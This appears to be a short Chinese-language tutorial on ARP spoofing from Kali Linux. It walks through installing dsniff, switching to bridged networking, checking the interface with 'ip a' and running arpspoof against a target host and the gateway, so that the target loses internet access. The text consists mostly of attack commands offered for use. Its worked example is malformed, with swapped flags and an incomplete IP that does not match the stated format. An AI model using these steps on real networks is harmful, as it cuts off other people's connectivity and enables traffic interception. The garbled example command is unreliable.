这个原理就很简单了,拦截网关的回复数据,让目标主机无法出入网关
在执行之前需要下载工具包

apt-get install -y dsniff

下载完成之后把kali的上网模式改成桥接成主机
截图
然后查看本机的ip地址,命令如下

ip a

可以看到kali本机的IP存在于eth0这张网卡上,可以执行arp攻击了
命令格式如下

arpspoof -i 【网卡,一般为eth0】 -t [被攻击者的IP地址] [网关地址]
如:arpspoof -t eth0 i 192.168.111 192.168.1.1

输出之后敲回车,此时被攻击的主机无法访问公网,如图
截图